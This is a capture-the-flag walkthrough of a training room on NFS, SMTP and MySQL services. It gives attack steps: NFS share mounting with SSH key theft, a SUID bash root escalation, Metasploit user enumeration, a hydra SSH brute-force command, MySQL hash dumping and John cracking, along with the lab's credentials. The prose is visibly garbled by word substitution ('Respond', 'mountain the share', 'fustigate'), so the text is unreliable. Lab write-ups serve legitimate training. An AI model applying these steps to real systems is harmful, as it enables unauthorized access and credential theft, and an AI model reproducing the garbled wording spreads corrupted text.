In this article, I tried to prepare a write-up for the "Network Services 2"  room ontryhackme.

[Chore one] Get Connected

This room is a sequel to the first network services room. Similarly, it will explore a few more common Network Service vulnerabilities and misconfigurations that you're likely to find in CTFs, and some penetration exam scenarios.

#1 Ready? Let'southward get going!

Respond: No respond needed

[Task ii] Understanding NFS

NFS stands for "Network File Organisation" and allows a system to share directories and files with others over a network. By using NFS, users and programs can admission files on remote systems almost as if they were local files. It does this past mounting all, or a portion of a file system on a server. The portion of the file system that is mounted can be accessed by clients with whatever privileges are assigned to each file.

#1 What does NFS represent?

NFS stands for "Network File System" and allows a organization to share directories and files with others over a network.

Respond: Network File System

#2 What procedure allows an NFS customer to collaborate with a remote directory as though it was a physical device?

 By using NFS, users and programs can access files on remote systems virtually every bit if they were local files. It does this past "mounting" all, or a portion of a file system on a server.

Respond: Mounting

#three What does NFS use to represent files and directories on the server?

If someone wants to access a file using NFS, an RPC call is placed to NFSD (the NFS daemon) on the server. This call takes parameters such every bit:

  • The file handle
  •  The name of the file to be accessed
  •  The user'south, user ID
  •  The user's group ID

ANSWER: file Handle

#4 What protocol does NFS use to communicate between the server and client?

 The mount service will then human activity to connect to the relevant mount daemon using RPC.

ANSWER: RPC

#5 What ii pieces of user data does the NFS server take as parameters for controlling user permissions?

If someone wants to access a file using NFS, an RPC phone call is placed to NFSD (the NFS daemon) on the server. This telephone call takes parameters such as:

  •  The file handle
  •  The name of the file to be accessed
  •  The user's, user ID
  •  The user'due south grouping ID

Answer: user id / group id

#6 Can a Windows NFS server share files with a Linux customer? (Y/North)

Reply: Y

#7 Tin a Linux NFS server share files with a MacOS client? (Y/North)

Reply: Y

#8 What is the latest version of NFS?

You lot tin can find the answer on this website

ANSWER: 4.ii

[Task 3] Enumerating NFS

Yous tin can use this Nmap query:

nmap -p- -A -sC -Pn [IP Adress]
Nmap Result
Nmap Outcome

#ane Comport a thorough port scan scan of your choosing, how many ports are open up?

Port 22, 111, 2049, 37069, 39969, 41047, 48707 are open.

Respond: 7

#2 Which port contains the service we're looking to enumerate?

Y'all tin see the answer in the 2nd picture above.

ASNWER: 2049

#three Now, utilize /usr/sbin/showmount -e [IP] to list the NFS shares, what is the name of the visible share?

ANSWER: /dwelling house

#4 Change directory to where you mounted the share- what is the proper name of the folder within?

Time to mountain the share to our local machine!

First, use "mkdir /tmp/mount" to create a directory on your car to mount the share to. This is in the /tmp directory- and so be enlightened that it will be removed on restart.

So, use the mount command we broke downwardly earlier to mountain the NFS share to your local auto.

Reply: cappucino

#5 Have a look inside this directory, look at the files. Looks like  we're inside a user'southward home directory…

Respond: No answer needed

#6 Which of these folders could contain keys that would requite us remote access to the server?

ANSWER: .ssh

#7 Which of these keys is about useful to u.s.a.?

ANSWER: id_rsa

#8 Can nosotros log into the motorcar usingssh -i <key-file> <username>@<ip>? (Y/North)

ANSWER: Y

[Task iv] Exploiting NFS

#1 First, change directory to the mountain point on your machine, where the NFS share should withal be mounted, and and then into the user's home directory.

ANSWER: No reply needed

#2 The copied bash shell must be owned by a root user, you tin can set this using "sudo chown root bash"

ANSWER: No answer needed

#3 What letter do we use to set up the SUID bit set using chmod?

Respond: s

#iv What does the permission set await like? Brand sure that it ends with -sr-x.

ANSWER: -rwsr-sr-x

#5 The -p persists the permissions, so that it can run equally root with SUID- as otherwise fustigate volition sometimes drop the permissions.

ANSWER: No answer needed

#6 Peachy! If all's gone well you should have a beat out every bit root! What'south the root flag?

ANSWER: I'm certain you can find it in your own efforts 🙂

[Chore five] Understanding SMTP

#1 What does SMTP stand for?

SMTP stands for "Uncomplicated Mail Transfer Protocol".

Respond: Uncomplicated Mail Transfer Protocol

#2 What does SMTP handle the sending of?

ANSWER: emails

#iii What is the first step in the SMTP process?

The mail user agent, which is either your email client or an external program. connects to the SMTP server of your domain. This initiates the SMTP handshake.

ANSWER: SMTP handshake

#four What is the default SMTP port?

This connection works over the SMTP port- which is usually 25.

ANSWER: 25

#v Where does the SMTP server send the email if the recipient's server is not available?

 If the recipient's server can't exist accessed, or is not bachelor– the Email gets put into an SMTP queue.

Answer: smtp queue

#6 On what server does the E-mail ultimately end upward on?

ANSWER: POP/IMAP

#vii Tin a Linux machine run an SMTP server? (Y/Northward)

SMTP Server software is readily available on Windows server platforms, with many other variants of SMTP existence available to run on Linux.

Answer: Y

#8 Tin a Windows car run an SMTP server? (Y/Due north)

SMTP Server software is readily available on Windows server platforms, with many other variants of SMTP being available to run on Linux.

Respond: Y

[Task half-dozen] Enumerating SMTP

Before we brainstorm, brand sure to deploy the room and give it some time to kicking. Please be enlightened, this can take up to five minutes then be patient!

#one First, lets run a port scan confronting the target auto, same as last time. What port is SMTP running on?

Answer: 25

#2 Okay, at present we know what port we should be targeting, let's start up Metasploit. What command practise we use to practice this?

Respond: msfconsole

#iii Permit's search for the module "smtp_version", what's it's full module name?

Respond: auxiliary/scanner/smtp/smtp_version

#4 Great, now- select the module and listing the options. How do we do this?

ANSWER: options

#five Have a look through the options, does everything seem correct? What is the option we need to fix?

Respond: RHOSTS

#6 Set up that to the correct value for your target machine. Then run the exploit. What's the system post name?

Answer: polosmtp.dwelling

#vii What Mail Transfer Agent (MTA) is running the SMTP server? This volition require some external research.

You tin find the answer on this website .

ANSWER: Postfix

#eight Good! We've now got a expert amount of data on the target system to move onto the side by side phase. Permit'south search for the module "smtp_enum", what's it's full module proper name?

Respond: auxiliary/scanner/smtp/smtp_enum

#ix What option do we need to set up to the wordlist's path?

ANSWER: USER_FILE

#10 Once nosotros've set this selection, what is the other essential paramater we need to set?

Reply: RHOSTS

#11 At present, set the THREADS parameter to xvi and run the exploit, this may take a few minutes, so grab a cup of tea, coffee, water. Proceed yourself hydrated!

ANSWER: No answer needed

#12 Okay! Now that'south finished, what username is returned?

ANSWER: administrator

[Task seven]  Exploiting SMTP

#i What is the password of the user we found during our enumeration phase?

Y'all can apply this command:

hydra -t 16 -l [USERNAME] -P [rockyou.txt location] -vV [Machine IP Addres] ssh

ANSWER: alejandro

#two Great! Now, let'due south SSH into the server as the user, what is contents of smtp.txt

You lot tin can use this control:

ssh administrator@[Machine IP Accost] Password: alejandro

ANSWER: I'yard sure you tin find it in your own efforts 🙂

[Chore viii] Understanding MySQL

#one What type of software is MySQL?

MySQL is a relational database direction organisation (RDBMS) based on Structured Query Language (SQL).

ANSWER: relational database management system

#2 What linguistic communication is MySQL based on?

They utilise a language, specifically the Structured Query Linguistic communication (SQL).

Answer: SQL

#3 What communication model does MySQL use?

Every bit we knoww, information technology uses a client-server model.

ANSWER: customer-server

#four What is a common application of MySQL?

Reply: back end database

#5 What major social network uses MySQL as their dorsum-end database? This will require further research.

ANSWER: Facebook

[Task nine] Enumerating MySQL

Before we begin, brand certain to deploy the room and give it some time to boot. Delight be aware, this can have up to five minutes so be patient!

#i What port is MySQL using?

Respond: 3306

#2 We can exercise this using the command "mysql -h [IP] -u [username] -p"

Answer: No reply needed

#three Okay, we know that our login credentials work. Lets quit out of this session with "go out" and launch up Metasploit.

ANSWER: No answer needed

#iv Search for, select and list the options it needs. What three options do nosotros need to set? (in descending order).

ANSWER: Countersign/RHOSTS/USERNAME

#5 Run the exploit. By default it volition test with the "select module()" command, what result does this give you?

ANSWER: 5.7.29-0ubuntu0.18.04.1

#six Modify the "sql" option to "show databases". how many databases are returned?

Answer: iv

[Task ten] Exploiting MySQL

#1 Commencement, let'southward search for and select the "mysql_schemadump" module. What's the module's full proper name?

ANSWER: auxiliary/scanner/mysql/mysql_schemadump

#two What'south the proper name of the last table that gets dumped?

Beginning, you must beginning "mysql" services:

So nosotros should use msfconsole:

We accept to set the parameters:

Then run this payload:

Reply: ten$waits_global_by_latency

#3 Search for and select the "mysql_hashdump" module. What's the module's full name?

ANSWER: auxiliary/scanner/mysql/mysql_hashdump

#4 Once again, I'll let you lot accept information technology from here. Set the relevant options, run the exploit. What not-default user stands out to yous?

ANSWER: carl

#5 What is the user/hash combination cord?

Answer: carl:*EA031893AA21444B170FC2162A56978B8CEECE18

#6 Now, nosotros need to crack the countersign! Let's try John the Ripper confronting information technology using: "john hash.txt" what is the password of the user we found?

Answer: doggie

#vii What's the contents of MySQL.txt

ANSWER: I'm sure you can find information technology in your ain efforts 🙂

[Chore xi] Further Learning

#1 Congratulations! You did it!

ANSWER: No answer needed

So far, I take tried to explain the solutions of the questions as detailed as I can. I promise it helped y'all. Come across you lot in my adjacent write-upwards.